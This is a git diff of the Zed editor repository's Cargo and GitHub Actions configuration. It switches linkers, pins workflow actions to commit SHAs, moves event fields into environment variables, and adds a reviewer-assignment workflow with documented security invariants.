diff --git a/.cargo/ci-config.toml b/.cargo/ci-config.toml index b31b79a59b262a5cc18cf1d2b32124a97bab4fc7..6a5feece648a39be39e99fa3eb5807713b911348 100644 --- a/.cargo/ci-config.toml +++ b/.cargo/ci-config.toml @@ -15,14 +15,4 @@ rustflags = ["-D", "warnings"] [profile.dev] debug = "limited" -# Use Mold on Linux, because it's faster than GNU ld and LLD. -# -# We no longer set this in the default `config.toml` so that developers can opt in to Wild, which -# is faster than Mold, in their own ~/.cargo/config.toml. -[target.x86_64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] -[target.aarch64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] diff --git a/.cargo/config.toml b/.cargo/config.toml index 9b2e6f51c96e3ae98a54bbb11524210911d0e262..a9bf1f9cc975cf812605e88379def0ab334f76ad 100644 --- a/.cargo/config.toml +++ b/.cargo/config.toml @@ -16,5 +16,9 @@ rustflags = [ "target-feature=+crt-static", # This fixes the linking issue when compiling livekit on Windows ] +# We need lld to link libwebrtc.a successfully on aarch64-linux +[target.aarch64-unknown-linux-gnu] +rustflags = ["-C", "link-arg=-fuse-ld=lld"] + [env] MACOSX_DEPLOYMENT_TARGET = "10.15.7" diff --git a/.config/nextest.toml b/.config/nextest.toml index ab03abd839600e1a84ebd5eea9709f60cea1c7f0..b18a3f31e4a75af0636b4d8d8fdd81f48d8d93e6 100644 --- a/.config/nextest.toml +++ b/.config/nextest.toml @@ -42,3 +42,7 @@ slow-timeout = { period = "300s", terminate-after = 1 } [[profile.default.overrides]] filter = 'package(editor) and test(test_random_split_editor)' slow-timeout = { period = "300s", terminate-after = 1 } + +[[profile.default.overrides]] +filter = 'package(editor) and test(test_random_blocks)' +slow-timeout = { period = "300s", terminate-after = 1 } diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs index fbcc76a8654f7ed2241fb05c305eb466e3177c20..2650e36997655b1ab7376e8ed7052a8fc24b2fc6 100644 --- a/.git-blame-ignore-revs +++ b/.git-blame-ignore-revs @@ -34,3 +34,11 @@ ffdda588b41f7d9d270ffe76cab116f828ad545e # 2024-07-24 docs: Format docs # https://github.com/zed-industries/zed/pull/15352 3a44a59f8ec114ac1ba22f7da1652717ef7e4e5c + +# 2026-02-27 Format Tree-sitter query files +# https://github.com/zed-industries/zed/pull/50138 +5ed538f49c54ca464bb9d1e59446060a3a925668 + +# 2026-02-28 Format proto files +# https://github.com/zed-industries/zed/pull/50413 +56a88a848be09cbcb66bcb3d85ec1f5644909f72 diff --git a/.github/CODEOWNERS.hold b/.github/CODEOWNERS.hold index 449a5fd07315845787c9f2a73f0a0a22608e92c3..c0dec880c718d4edbee4015876fa57c41d951c15 100644 --- a/.github/CODEOWNERS.hold +++ b/.github/CODEOWNERS.hold @@ -32,9 +32,6 @@ /crates/agent_ui/ @zed-industries/ai-team /crates/ai_onboarding/ @zed-industries/ai-team /crates/anthropic/ @zed-industries/ai-team -/crates/assistant_slash_command/ @zed-industries/ai-team -/crates/assistant_slash_commands/ @zed-industries/ai-team -/crates/assistant_text_thread/ @zed-industries/ai-team /crates/bedrock/ @zed-industries/ai-team /crates/cloud_llm_client/ @zed-industries/ai-team /crates/codestral/ @zed-industries/ai-team @@ -48,7 +45,6 @@ /crates/edit_prediction_context/ @zed-industries/ai-team /crates/edit_prediction_types/ @zed-industries/ai-team /crates/edit_prediction_ui/ @zed-industries/ai-team -/crates/eval/ @zed-industries/ai-team /crates/eval_utils/ @zed-industries/ai-team /crates/google_ai/ @zed-industries/ai-team /crates/language_model/ @zed-industries/ai-team @@ -62,8 +58,6 @@ /crates/rules_library/ @zed-industries/ai-team # SUGGESTED: Review needed - based on Richard Feldman (2 commits) /crates/shell_command_parser/ @zed-industries/ai-team -/crates/supermaven/ @zed-industries/ai-team -/crates/supermaven_api/ @zed-industries/ai-team /crates/vercel/ @zed-industries/ai-team /crates/x_ai/ @zed-industries/ai-team /crates/zeta_prompt/ @zed-industries/ai-team @@ -167,7 +161,6 @@ /extensions/glsl/ @zed-industries/ecosystem-team /extensions/html/ @zed-industries/ecosystem-team /extensions/proto/ @zed-industries/ecosystem-team -/extensions/slash-commands-example/ @zed-industries/ecosystem-team /extensions/test-extension/ @zed-industries/ecosystem-team /extensions/workflows/ @zed-industries/ecosystem-team diff --git a/.github/DISCUSSION_TEMPLATE/feature-requests.yml b/.github/DISCUSSION_TEMPLATE/feature-requests.yml index 183a3de934eccc8baa8428e822176e31d1d11782..e8a695063c34771ac6120b1e477b7494a17aa3c9 100644 --- a/.github/DISCUSSION_TEMPLATE/feature-requests.yml +++ b/.github/DISCUSSION_TEMPLATE/feature-requests.yml @@ -40,4 +40,4 @@ body: attributes: value: | Learn more about how feature requests work in our - [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/47963). + [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422). diff --git a/.github/ISSUE_TEMPLATE/10_bug_report.yml b/.github/ISSUE_TEMPLATE/10_bug_report.yml index 13e43219dd65a78af4afec479330bbc5fd85fe42..5eb8e8a6299c5189384b6d060e12cd61a2249a3c 100644 --- a/.github/ISSUE_TEMPLATE/10_bug_report.yml +++ b/.github/ISSUE_TEMPLATE/10_bug_report.yml @@ -100,7 +100,7 @@ body: label: (for AI issues) Model provider details placeholder: | - Provider: (Anthropic via ZedPro, Anthropic via API key, Copilot Chat, Mistral, OpenAI, etc.) - - Model Name: (Claude Sonnet 4.5, Gemini 3 Pro, GPT-5) + - Model Name: (Claude Sonnet 4.5, Gemini 3.1 Pro, GPT-5) - Mode: (Agent Panel, Inline Assistant, Terminal Assistant or Text Threads) - Other details (ACPs, MCPs, other settings, etc.): validations: diff --git a/.github/actions/run_tests/action.yml b/.github/actions/run_tests/action.yml index a071aba3a87dcf8e8f48f740115cfddf48b9f805..610c334a65c3a3817ab0ee2bb7356a923643092b 100644 --- a/.github/actions/run_tests/action.yml +++ b/.github/actions/run_tests/action.yml @@ -5,7 +5,7 @@ runs: using: "composite" steps: - name: Install nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c # nextest - name: Install Node uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 diff --git a/.github/actions/run_tests_windows/action.yml b/.github/actions/run_tests_windows/action.yml index 307b73f363b7d5fd7a3c9e5082c4f17d622ec165..3752cbb50d538459ea58d2219e591d1abbda6247 100644 --- a/.github/actions/run_tests_windows/action.yml +++ b/.github/actions/run_tests_windows/action.yml @@ -12,7 +12,7 @@ runs: steps: - name: Install test runner working-directory: ${{ inputs.working-directory }} - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c # nextest - name: Install Node uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4 diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 4470b5763fcf84f54ea1b0ef7c2f7bf9786eaaca..a56793ad6222e5788621f6c8a430205e9ad848d7 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,10 +1,13 @@ -Closes #ISSUE +Self-Review Checklist: + +- [ ] I've reviewed my own diff for quality, security, and reliability +- [ ] Unsafe blocks (if any) have justifying comments +- [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +- [ ] Tests cover the new/changed behavior +- [ ] Performance impact has been considered and is acceptable -Before you mark this PR as ready for review, make sure that you have: -- [ ] Added a solid test coverage and/or screenshots from doing manual testing -- [ ] Done a self-review taking into account security and performance aspects -- [ ] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +Closes #ISSUE Release Notes: -- N/A *or* Added/Fixed/Improved ... +- N/A or Added/Fixed/Improved ... diff --git a/.github/workflows/add_commented_closed_issue_to_project.yml b/.github/workflows/add_commented_closed_issue_to_project.yml index 5871f5ae0e61f97557ce926c4a2627841f50560d..27315e7160200dc323899b58d5c307aae656d5c6 100644 --- a/.github/workflows/add_commented_closed_issue_to_project.yml +++ b/.github/workflows/add_commented_closed_issue_to_project.yml @@ -35,7 +35,7 @@ jobs: - if: steps.is-post-close-comment.outputs.result == 'true' id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -63,13 +63,18 @@ jobs: } - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'true' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} run: | - echo "::notice::Skipping issue #${{ github.event.issue.number }} - commenter is staff member" + echo "::notice::Skipping issue #$ISSUE_NUMBER - commenter is staff member" # github-script outputs are JSON strings, so we compare against 'false' (string) - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'false' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + COMMENT_USER_LOGIN: ${{ github.event.comment.user.login }} run: | - echo "::notice::Adding issue #${{ github.event.issue.number }} to project (comment by ${{ github.event.comment.user.login }})" + echo "::notice::Adding issue #$ISSUE_NUMBER to project (comment by $COMMENT_USER_LOGIN)" - if: steps.is-post-close-comment.outputs.result == 'true' && steps.check-staff.outputs.result == 'false' uses: actions/add-to-project@244f685bbc3b7adfa8466e08b698b5577571133e # v1.0.2 diff --git a/.github/workflows/after_release.yml b/.github/workflows/after_release.yml index 9582e3f1956b3ecda383fc03efdb3d7ff67eaa68..ab2220764861b17317f1fa3971ecf2aa9b645c8d 100644 --- a/.github/workflows/after_release.yml +++ b/.github/workflows/after_release.yml @@ -27,7 +27,7 @@ jobs: - name: after_release::rebuild_releases_page::refresh_cloud_releases run: curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag=${{ github.event.release.tag_name || inputs.tag_name }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: after_release::rebuild_releases_page::redeploy_zed_dev @@ -76,7 +76,7 @@ jobs: "X-GitHub-Api-Version" = "2022-11-28" } $body = @{ branch = "master" } | ConvertTo-Json - $uri = "https://api.github.com/repos/${{ github.repository_owner }}/winget-pkgs/merge-upstream" + $uri = "https://api.github.com/repos/$env:GITHUB_REPOSITORY_OWNER/winget-pkgs/merge-upstream" try { Invoke-RestMethod -Uri $uri -Method Post -Headers $headers -Body $body -ContentType "application/json" Write-Host "Successfully synced winget-pkgs fork" @@ -110,7 +110,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: release::create_sentry_release @@ -131,11 +131,10 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" ''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: '❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}' defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/assign-reviewers.yml b/.github/workflows/assign-reviewers.yml new file mode 100644 index 0000000000000000000000000000000000000000..2a12a69defdd4f8933f1c549f0624d9bdcc9fd40 --- /dev/null +++ b/.github/workflows/assign-reviewers.yml @@ -0,0 +1,104 @@ +# Assign Reviewers — Smart team assignment based on diff weight +# +# Triggers on PR open and ready_for_review events. Checks out the coordinator +# repo (zed-industries/codeowner-coordinator) to access the assignment script and rules, +# then assigns the 1-2 most relevant teams as reviewers. +# +# NOTE: This file is stored in the codeowner-coordinator repo but must be deployed to +# the zed repo at .github/workflows/assign-reviewers.yml. See INSTALL.md. +# +# AUTH NOTE: Uses a GitHub App (COORDINATOR_APP_ID + COORDINATOR_APP_PRIVATE_KEY) +# for all API operations: cloning the private coordinator repo, requesting team +# reviewers, and setting PR assignees. GITHUB_TOKEN is not used. +# +# SECURITY INVARIANTS (pull_request_target): +# This workflow runs with access to secrets for ALL PRs including forks. +# It is safe ONLY because: +# 1. The checkout is the coordinator repo at ref: main — NEVER the PR head/branch +# 2. No ${{ }} interpolation of event fields in run: blocks — all routed via env: +# 3. The script never executes, sources, or reads files from the PR branch +# Violating any of these enables remote code execution with secret access. + +name: Assign Reviewers + +on: + # zizmor: ignore[dangerous-triggers] reviewed — no PR code checkout, only coordinator repo at ref: main + pull_request_target: + types: [opened, ready_for_review] + +# GITHUB_TOKEN is not used — all operations use the GitHub App token. +# Declare minimal permissions so the default token has no write access. +permissions: {} + +# Prevent duplicate runs for the same PR (e.g., rapid push + ready_for_review). +concurrency: + group: assign-reviewers-${{ github.event.pull_request.number }} + cancel-in-progress: true + +# NOTE: For ready_for_review events, the webhook payload may still carry +# draft: true due to a GitHub race condition (payload serialized before DB +# update). We trust the event type instead — the script rechecks draft status +# via a live API call as defense-in-depth. +# +# No author_association filter — external and fork PRs also get reviewer +# assignments. Assigned reviewers are inherently scoped to org team members +# by the GitHub Teams API. +jobs: + assign-reviewers: + if: >- + github.event.action == 'ready_for_review' || github.event.pull_request.draft == false + runs-on: ubuntu-latest + steps: + - name: Generate app token + id: app-token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ vars.COORDINATOR_APP_ID }} + private-key: ${{ secrets.COORDINATOR_APP_PRIVATE_KEY }} + repositories: codeowner-coordinator,zed + + # SECURITY: checks out the coordinator repo at ref: main, NOT the PR branch. + # persist-credentials: false prevents the token from leaking into .git/config. + - name: Checkout coordinator repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + repository: zed-industries/codeowner-coordinator + ref: main + path: codeowner-coordinator + token: ${{ steps.app-token.outputs.token }} + persist-credentials: false + + - name: Setup Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.11" + + - name: Install dependencies + run: | + pip install --no-deps -q --only-binary ':all:' \ + -r /dev/stdin <<< "pyyaml==6.0.3 --hash=sha256:b8bb0864c5a28024fac8a632c443c87c5aa6f215c0b126c449ae1a150412f31d" + + - name: Assign reviewers + env: + GH_TOKEN: ${{ steps.app-token.outputs.token }} + PR_URL: ${{ github.event.pull_request.html_url }} + TARGET_REPO: ${{ github.repository }} + ASSIGN_INTERNAL: ${{ vars.ASSIGN_INTERNAL || 'false' }} + ASSIGN_EXTERNAL: ${{ vars.ASSIGN_EXTERNAL || 'true' }} + run: | + cd codeowner-coordinator + python .github/scripts/assign-reviewers.py \ + --pr "$PR_URL" \ + --apply \ + --rules-file team-membership-rules.yml \ + --repo "$TARGET_REPO" \ + --org zed-industries \ + 2>&1 | tee /tmp/assign-reviewers-output.txt + + - name: Upload output + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: assign-reviewers-output + path: /tmp/assign-reviewers-output.txt + retention-days: 30 diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 60cc66294af2cf65e17aaad530a9df511ec61503..717c5e2fa5e3c35f3ff33d176f73022e7a0c95d4 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -18,26 +18,25 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: autofix_pr::run_autofix::checkout_pr - run: gh pr checkout ${{ inputs.pr_number }} + run: gh pr checkout "$PR_NUMBER" env: + PR_NUMBER: ${{ inputs.pr_number }} GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - name: steps::setup_cargo_config run: | mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_pnpm @@ -92,21 +91,24 @@ jobs: if: needs.run_autofix.outputs.has_changes == 'true' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write + permission-workflows: write - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.get-app-token.outputs.token }} + token: ${{ steps.generate-token.outputs.token }} - name: autofix_pr::commit_changes::checkout_pr - run: gh pr checkout ${{ inputs.pr_number }} + run: gh pr checkout "$PR_NUMBER" env: - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + PR_NUMBER: ${{ inputs.pr_number }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} - name: autofix_pr::download_patch_artifact uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 with: @@ -122,7 +124,7 @@ jobs: GIT_COMMITTER_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com GIT_AUTHOR_NAME: Zed Zippy GIT_AUTHOR_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} concurrency: group: ${{ github.workflow }}-${{ inputs.pr_number }} cancel-in-progress: true diff --git a/.github/workflows/background_agent_mvp.yml b/.github/workflows/background_agent_mvp.yml index 528600138243cb8aca2e0fe0645eda198fc4f2b2..2f048d572df6fb45368c6d7aece574e83c9e7949 100644 --- a/.github/workflows/background_agent_mvp.yml +++ b/.github/workflows/background_agent_mvp.yml @@ -38,7 +38,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 @@ -50,7 +50,7 @@ jobs: "${HOME}/.local/bin/droid" --version - name: Setup Python - uses: actions/setup-python@v5 + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 with: python-version: "3.12" diff --git a/.github/workflows/bump_collab_staging.yml b/.github/workflows/bump_collab_staging.yml index d400905b4da3304a8b916d3a38ae9d8a2855dbf5..4f9724439f37b276de625e5810c777c12f20e4b9 100644 --- a/.github/workflows/bump_collab_staging.yml +++ b/.github/workflows/bump_collab_staging.yml @@ -11,7 +11,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index 480d8b0ada98e859d2e72b49a39805ffe8f72b25..6b2fa66147b656efd9c8e28cd43cd2e010930dd1 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -13,18 +13,18 @@ jobs: if: github.repository_owner == 'zed-industries' runs-on: namespace-profile-16x32-ubuntu-2204 steps: - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - token: ${{ steps.get-app-token.outputs.token }} ref: ${{ inputs.branch }} + token: ${{ steps.generate-token.outputs.token }} - name: bump_patch_version::run_bump_patch_version::bump_patch_version run: | channel="$(cat crates/zed/RELEASE_CHANNEL)" @@ -51,7 +51,7 @@ jobs: GIT_COMMITTER_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com GIT_AUTHOR_NAME: Zed Zippy GIT_AUTHOR_EMAIL: 234243425+zed-zippy[bot]@users.noreply.github.com - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} concurrency: group: ${{ github.workflow }}-${{ inputs.branch }} cancel-in-progress: true diff --git a/.github/workflows/catch_blank_issues.yml b/.github/workflows/catch_blank_issues.yml index dd425afc886e86c1217a94e90eabced013f66bf0..dbceac5a196f2dc9c0963e491bd346dc8c0eff51 100644 --- a/.github/workflows/catch_blank_issues.yml +++ b/.github/workflows/catch_blank_issues.yml @@ -16,7 +16,7 @@ jobs: timeout-minutes: 5 steps: - id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v2.1.4 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} @@ -42,8 +42,10 @@ jobs: } - if: steps.check-staff.outputs.result == 'true' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} run: | - echo "::notice::Skipping issue #${{ github.event.issue.number }} - actor is staff member" + echo "::notice::Skipping issue #$ISSUE_NUMBER - actor is staff member" - if: steps.check-staff.outputs.result == 'false' id: add-label diff --git a/.github/workflows/cherry_pick.yml b/.github/workflows/cherry_pick.yml index 9d46f300b509347b2853c00575c4e82fd9a2863c..ed0800dc5bbf1ec59182e9d24753e9b5112c4d13 100644 --- a/.github/workflows/cherry_pick.yml +++ b/.github/workflows/cherry_pick.yml @@ -26,21 +26,27 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - - id: get-app-token + - id: generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write + permission-workflows: write + permission-pull-requests: write - name: cherry_pick::run_cherry_pick::cherry_pick - run: ./script/cherry-pick ${{ inputs.branch }} ${{ inputs.commit }} ${{ inputs.channel }} + run: ./script/cherry-pick "$BRANCH" "$COMMIT" "$CHANNEL" env: + BRANCH: ${{ inputs.branch }} + COMMIT: ${{ inputs.commit }} + CHANNEL: ${{ inputs.channel }} GIT_COMMITTER_NAME: Zed Zippy GIT_COMMITTER_EMAIL: hi@zed.dev - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/comment_on_potential_duplicate_issues.yml b/.github/workflows/comment_on_potential_duplicate_issues.yml index de51cb1105c98901237ec88d47c34c69ea5c8080..0d7ce3aad3ce9deacfedfe1d237c41127a639da0 100644 --- a/.github/workflows/comment_on_potential_duplicate_issues.yml +++ b/.github/workflows/comment_on_potential_duplicate_issues.yml @@ -27,14 +27,14 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: sparse-checkout: script/github-check-new-issue-for-duplicates.py sparse-checkout-cone-mode: false - name: Get github app token id: get-app-token - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 # v1.11.7 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 with: app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} diff --git a/.github/workflows/community_champion_auto_labeler.yml b/.github/workflows/community_champion_auto_labeler.yml index fa44afc16dcaee4c1e1176b9344aed476ac6d8e5..82a9e274d64725b0e55c6ced46ca64ac3890e35e 100644 --- a/.github/workflows/community_champion_auto_labeler.yml +++ b/.github/workflows/community_champion_auto_labeler.yml @@ -12,7 +12,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: Check if author is a community champion and apply label - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b # v7 env: COMMUNITY_CHAMPIONS: | 0x2CA diff --git a/.github/workflows/community_update_all_top_ranking_issues.yml b/.github/workflows/community_update_all_top_ranking_issues.yml index 59926f35563a4b21e3486ecbd454a4ccf951461e..b8003a69b243c3cafbf40857c653fb03f515eeec 100644 --- a/.github/workflows/community_update_all_top_ranking_issues.yml +++ b/.github/workflows/community_update_all_top_ranking_issues.yml @@ -10,7 +10,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up uv uses: astral-sh/setup-uv@caf0cab7a618c569241d31dcd442f54681755d39 # v3 with: @@ -22,4 +22,6 @@ jobs: - name: Install dependencies run: uv sync --project script/update_top_ranking_issues -p 3.13 - name: Run script - run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token ${{ secrets.GITHUB_TOKEN }} --issue-reference-number 5393 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token "$GITHUB_TOKEN" --issue-reference-number 5393 diff --git a/.github/workflows/community_update_weekly_top_ranking_issues.yml b/.github/workflows/community_update_weekly_top_ranking_issues.yml index 75ba66b934b5861bd51aef4238a1a4188dddefc3..90d1934ffcb6d5d711896d3902b70599e4b06872 100644 --- a/.github/workflows/community_update_weekly_top_ranking_issues.yml +++ b/.github/workflows/community_update_weekly_top_ranking_issues.yml @@ -10,7 +10,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up uv uses: astral-sh/setup-uv@caf0cab7a618c569241d31dcd442f54681755d39 # v3 with: @@ -22,4 +22,6 @@ jobs: - name: Install dependencies run: uv sync --project script/update_top_ranking_issues -p 3.13 - name: Run script - run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token ${{ secrets.GITHUB_TOKEN }} --issue-reference-number 6952 --query-day-interval 7 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: uv run --project script/update_top_ranking_issues script/update_top_ranking_issues/main.py --github-token "$GITHUB_TOKEN" --issue-reference-number 6952 --query-day-interval 7 diff --git a/.github/workflows/compare_perf.yml b/.github/workflows/compare_perf.yml index e5a2d4f9c928eac2d1b1cf54ed374f8b0cca5d25..2b2154ce9bd14c85d0f0d10e95c4065a458006a1 100644 --- a/.github/workflows/compare_perf.yml +++ b/.github/workflows/compare_perf.yml @@ -21,7 +21,7 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -30,34 +30,45 @@ jobs: cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: compare_perf::run_perf::install_hyperfine - uses: taiki-e/install-action@hyperfine + uses: taiki-e/install-action@b4f2d5cb8597b15997c8ede873eb6185efc5f0ad - name: steps::git_checkout - run: git fetch origin ${{ inputs.base }} 